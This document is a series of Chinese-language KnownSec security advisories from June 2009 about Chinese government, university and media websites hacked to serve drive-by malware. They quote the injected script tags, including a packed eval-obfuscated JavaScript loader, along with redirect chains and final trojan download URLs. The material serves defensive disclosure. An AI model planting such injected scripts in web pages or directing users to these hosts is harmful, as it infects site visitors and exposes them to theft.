知道创宇

发布时间：Thu Jun 25 2009 17:59:45 UTC+0800
最后更新时间：Thu Jun 25 2009 17:59:45 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 宁夏大武口区民政局（http://nxysw.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://nxysw.cn/

网页被嵌入恶意链接代码：

<script  src=http://kao17.cn></script>
<script  src=http://www.guaranty.com.cn/css/email.asp></script>
<script  src=http://www.guaranty.com.cn/css/email.js></script>
<script  src=http://moone.co.kr/images/a.js></script>
挂马分析：
[wide]http://nxysw.cn/
 [script]http://kao17.cn
  [frame]http://count24.51yes.com/sa.aspx?id=248364695
  [frame]http://ruyi-8.cn/web.htm
   [frame]http://ruyi-8.cn/benner.htm
    [script]http://ruyi-8.cn/images.js
     [frame]http://ruyi-8.cn/ec1.htm
     [frame]http://ruyi-8.cn/fyfl.htm
     [frame]http://ruyi-8.cn/fyff.htm
     [frame]http://ruyi-8.cn/fydvd.htm
     [frame]http://ruyi-8.cn/fycry.htm
     [frame]http://ruyi-8.cn/ec0.htm
     [frame]http://ruyi-8.cn/ecb.htm
     [frame]http://ruyi-8.cn/fyr.htm
    [script]http://ruyi-8.cn/sfpf.js
     [frame]http://ruyi-8.cn/sfpf.htm
    [frame]http://ruyi-8.cn/xxcutea.htm
  [frame]http://www.chchc.net
 [script]http://moone.co.kr/images/a.js
  [frame]http://elfah.net/jacon/css/fyfl.htm
  [frame]http://elfah.net/jacon/css/a.htm
  [frame]http://www.e20i.cn/index.htm
  [frame]http://count11.51yes.com/sa.aspx?id=110639713
最终下载病毒文件：
http://ad123.info/css.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：5
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Thu Jun 25 2009 17:53:25 UTC+0800
最后更新时间：Thu Jun 25 2009 17:53:25 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 广西.桂林.兴安（http://www.chinalqw.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chinalqw.gov.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://sina.ch.ma/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://www.chinalqw.gov.cn/
 [script]http://sina.ch.ma/js.js?google_ad=10×90_as
  [frame]http://www.xiaolala.com/m/360.htm
   [frame]http://www.xiaolala.com/m/x.htm
    [script]http://www.xiaolala.com/m/all.css
    [frame]http://www.xiaolala.com/m/1.htm
    [frame]http://www.xiaolala.com/m/office.htm
    [frame]http://www.xiaolala.com/m/newlz.htm
    [frame]http://www.xiaolala.com/m/s.htm
    [frame]http://www.xiaolala.com/m/bf.htm
    [frame]http://www.xiaolala.com/m/cx.htm
    [frame]http://www.xiaolala.com/m/2.htm
    [frame]http://www.xiaolala.com/m/pp.htm
    [frame]http://www.xiaolala.com/m/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
   [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件：
http://mvt.ht.cx/a.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Thu Jun 25 2009 17:50:38 UTC+0800
最后更新时间：Thu Jun 25 2009 17:50:38 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 南京农业大学学报（http://nauxb.njau.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://nauxb.njau.edu.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://sogou.ch.ma/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://nauxb.njau.edu.cn/
 [script]http://sogou.ch.ma/js.js?google_ad=10×90_as
  [frame]http://www.xiaolala.com/m/360.htm
   [frame]http://www.xiaolala.com/m/x.htm
    [script]http://www.xiaolala.com/m/all.css
    [frame]http://www.xiaolala.com/m/1.htm
    [frame]http://www.xiaolala.com/m/office.htm
    [frame]http://www.xiaolala.com/m/newlz.htm
    [frame]http://www.xiaolala.com/m/s.htm
    [frame]http://www.xiaolala.com/m/bf.htm
    [frame]http://www.xiaolala.com/m/cx.htm
    [frame]http://www.xiaolala.com/m/2.htm
    [frame]http://www.xiaolala.com/m/pp.htm
    [frame]http://www.xiaolala.com/m/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
   [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件：
http://mvt.ht.cx/a.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：12
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Wed Jun 24 2009 21:41:52 UTC+0800
最后更新时间：Wed Jun 24 2009 21:41:52 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国绿化主页（http://www.chinagreen.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chinagreen.gov.cn/

网页被嵌入恶意链接代码：

<script src=http://222.231.60.19/seraph/door/iisHelp/help.js></script>
挂马分析：
[wide]http://www.chinagreen.gov.cn/
 [script]http://222.231.60.19/seraph/door/iishelp/help.js
  [frame]http://elfah.net/jacon/css/fyfl.htm
   [frame]http://elfah.net/jacon/css/sfi.htm
   [frame]http://elfah.net/jacon/css/sff.htm
   [script]http://js.users.51.la/2962718.js
  [frame]http://elfah.net/jacon/css/a.htm
   [frame]http://elfah.net/jacon/css/benner.htm
    [script]http://elfah.net/jacon/css/images.js
    [script]http://elfah.net/jacon/css/sfpf.js
    [frame]http://elfah.net/jacon/css/xxcutea.htm
   [script]http://js.users.51.la/2962718.js
  [frame]http://www.e20i.cn/index.htm
  [frame]http://count11.51yes.com/sa.aspx?id=110639713
最终下载病毒文件：
http://www.qiqijs.com/gm/gm.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Wed Jun 24 2009 21:34:28 UTC+0800
最后更新时间：Wed Jun 24 2009 21:34:28 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 西安之窗（http://www.029win.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.029win.com/include/dedeajax2.js

网页被嵌入恶意链接代码：

function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = “Cookie1=Filter;expires=”+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’2.a(\’<6 7=3://9.0.1/5/8.4></6>\’)',62,11,’chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln’.split(’|'),0,{}));window.status=”final”;}}goad();
挂马分析：
[wide]http://www.029win.com/
 [script]http://www.029win.com//include/dedeajax2.js
  [script]http://ufy9g1.chinaw3.com/s/ss.js
   [frame]http://ttfghv.3322.org:338/b174152/b17.htm
    [frame]http://ttfghv.3322.org:338/b174152/new.html
     [script]http://ttfghv.3322.org:338/b174152/../xnnn.js
     [script]http://ttfghv.3322.org:338/b174152/../zhin.js
     [frame]http://ttfghv.3322.org:338/b174152/../apple4.htm
     [frame]http://ttfghv.3322.org:338/b174152/fx.htm
     [frame]http://ttfghv.3322.org:338/b174152/../active.htm
     [frame]http://ttfghv.3322.org:338/b174152/../cx.htm
     [frame]http://ttfghv.3322.org:338/b174152/../real10.htm
     [frame]http://ttfghv.3322.org:338/b174152/../real11.htm
     [script]http://ttfghv.3322.org:338/b174152/../wewew.js
    [frame]http://ttfghv.3322.org:338/b174152/new.html
    [script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
   [script]http://js.tongji.cn.yahoo.com/866793/ystat.js
最终下载病毒文件：
http://x9s7b.cn:8808/a/lzz.css
http://x9s7b.cn:8808/a/as.css
http://x9s7b.cn:8808/a/bf.css
http://x9s7b.cn:8808/a/ms.css
http://x9s7b.cn:8808/a/re.css
http://x9s7b.cn:8808/a/real11.css
http://x9s7b.cn:8808/Baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

发布时间：Mon Jun 22 2009 18:12:11 UTC+0800
最后更新时间：Mon Jun 22 2009 18:12:11 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国互联网协会网络版权联盟（http://www.iscu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.iscu.cn/

网页被嵌入恶意链接代码：

<script src=http://%77%76%67%37%2E%63%6E></script>
挂马分析：
[wide]http://www.iscu.cn/
 [script]http://%77%76%67%37%2e%63%6e
  [frame]http://www.ya-d1.cn/5/index.html
   [frame]http://www.w2photo.cn/5/new.html
    [frame]http://www.w2photo.cn/5/ct14.htm
    [frame]http://www.w2photo.cn/5/ctfl.htm
    [frame]http://www.w2photo.cn/5/z.htm
    [frame]http://www.w2photo.cn/5/ctvod.htm
    [frame]http://www.w2photo.cn/5/ctxxz.htm
    [frame]http://www.w2photo.cn/5/ctqm.htm
    [frame]http://www.w2photo.cn/5/ctlb.htm
    [frame]http://www.w2photo.cn/5/ct122121.htm
   [script]http://js.tongji.linezing.com/1157776/tongji.js
   [script]http://js.tongji.linezing.com/1157786/tongji.js
最终下载病毒文件：
http://www.down2sun.cn/1/o55.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
当前Google认为该网站：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

发布时间：Sun Jun 21 2009 17:16:50 UTC+0800
最后更新时间：Sun Jun 21 2009 17:16:50 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 雁塔在线（http://www.itxian.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.itxian.com/

网页被嵌入恶意链接代码：

<script src=http://%77%76%67%37%2E%63%6E></script>
挂马分析：
[wide]http://www.itxian.com/
 [script]http://%77%76%67%37%2e%63%6e
  [frame]http://www.ya-d1.cn/5/index.html
   [frame]http://www.w2photo.cn/5/new.html
    [frame]http://www.w2photo.cn/5/ct14.htm
    [frame]http://www.w2photo.cn/5/ctfl.htm
    [frame]http://www.w2photo.cn/5/z.htm
    [frame]http://www.w2photo.cn/5/ctvod.htm
    [frame]http://www.w2photo.cn/5/ctxxz.htm
    [frame]http://www.w2photo.cn/5/ctqm.htm
    [frame]http://www.w2photo.cn/5/ctlb.htm
    [frame]http://www.w2photo.cn/5/ct122121.htm
   [script]http://js.tongji.linezing.com/1157776/tongji.js
   [script]http://js.tongji.linezing.com/1157786/tongji.js
最终下载病毒文件：
http://www.down2sun.cn/1/o5.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 挂马次数：1
google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 8% [?]

发布时间：Sun Jun 21 2009 17:10:35 UTC+0800
最后更新时间：Sun Jun 21 2009 17:10:35 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 华中科技大学同济医学院pet中心（http://www.hzpet.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hzpet.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://%77%77%2E%78%6E%69%62%69%2E%63%6F%6D/js.js></script></script></script></script>  
 
   <script src=http://%77%76%67%37%2E%63%6E></script>
挂马分析：
[wide]http://www.hzpet.cn/
 [script]http://%77%77%2e%78%6e%69%62%69%2e%63%6f%6d/js.js
 [script]http://%77%76%67%37%2e%63%6e
  [frame]http://www.ya-d1.cn/5/index.html
   [frame]http://www.w2photo.cn/5/new.html
    [frame]http://www.w2photo.cn/5/ct14.htm
    [frame]http://www.w2photo.cn/5/ctfl.htm
    [frame]http://www.w2photo.cn/5/z.htm
    [frame]http://www.w2photo.cn/5/ctvod.htm
    [frame]http://www.w2photo.cn/5/ctxxz.htm
    [frame]http://www.w2photo.cn/5/ctqm.htm
    [frame]http://www.w2photo.cn/5/ctlb.htm
    [frame]http://www.w2photo.cn/5/ct122121.htm
   [script]http://js.tongji.linezing.com/1157776/tongji.js
   [script]http://js.tongji.linezing.com/1157786/tongji.js
最终下载病毒文件：
http://www.down2sun.cn/1/o5.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 挂马次数：2
google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 6% [?]

发布时间：Sat Jun 20 2009 01:48:00 UTC+0800
最后更新时间：Sat Jun 20 2009 01:48:00 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天接到网友举报称新浪宠物频道（http://pet.sina.com.cn/）被植入恶意代码。经知道创宇安全团队确认，此次挂马事件的起因是由于宠酷网被挂马，而被挂页面经新浪宠物频道引用。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://poke.petkoo.com/member/js/1.js

该脚本尾部被植入恶意代码：
document.write(’<script src=http://google.08.cn/js/O8.js?sohu></script>’)

挂马分析：
[wide]http://pet.sina.com.cn/
 [frame]http://www.petkoo.com/index/right.shtml
  [frame]http://bj.sina.com.cn/petkoo/4.html
  [frame]http://poke.petkoo.com/member/indexlogin.aspx
   [script]http://poke.petkoo.com/member/js/1.js
    [script]http://google.08.cn/js/o8.js?sohu
     [frame]http://csa22eeq.cn/08/0008.htm?22
      [frame]http://csa22eeq.cn/08/index.html
       [frame]http://csa22eeq.cn/08/ct14.htm
       [frame]http://csa22eeq.cn/08/ctfl.htm
       [frame]http://csa22eeq.cn/08/z.htm
       [frame]http://csa22eeq.cn/08/ctvod.htm
       [frame]http://csa22eeq.cn/08/ctxxz.htm
       [frame]http://csa22eeq.cn/08/ctqm.htm
       [frame]http://csa22eeq.cn/08/ctlb.htm
       [frame]http://csa22eeq.cn/08/ct122121.htm
      [script]http://js.tongji.linezing.com/1116244/tongji.js

挂马页面被新浪宠物频道引用：

最终下载病毒文件：
http://4534rr232323.cn/q8.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全已经于确认挂马后第一时间通知新浪官方处理。

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]

发布时间：Fri Jun 19 2009 21:14:41 UTC+0800
最后更新时间：Fri Jun 19 2009 21:14:41 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 北京吉利大学招生网（http://www.bgeelyuedu.com/）被植入恶意代码。据了解，在中国教育在线网站（http://www.eol.cn/include/cer.net/gaokao/zhuanti/2006luqu.shtml）上有该网站的广告，知道创宇安全团队提醒您切勿点击此广告。

当用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bgeelyuedu.com/

网页被嵌入恶意链接代码：

<script language=javascript src=http://sina.ch.ma/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://www.bgeelyuedu.com/
 [script]http://sina.ch.ma/js.js?google_ad=10×90_as
  [frame]http://www.meijite.com/kf/360.htm
   [frame]http://www.meijite.com/kf/x.htm
    [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    [script]http://www.meijite.com/kf/all.css
    [frame]http://www.meijite.com/kf/1.htm
    [frame]http://www.meijite.com/kf/office.htm
    [frame]http://www.meijite.com/kf/newlz.htm
    [frame]http://www.meijite.com/kf/s.htm
    [frame]http://www.meijite.com/kf/bf.htm
    [frame]http://www.meijite.com/kf/cx.htm
    [frame]http://www.meijite.com/kf/2.htm
    [frame]http://www.meijite.com/kf/pp.htm
    [frame]http://www.meijite.com/kf/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件：
http://360.0rg.fr/vv.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 挂马次数：10
google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]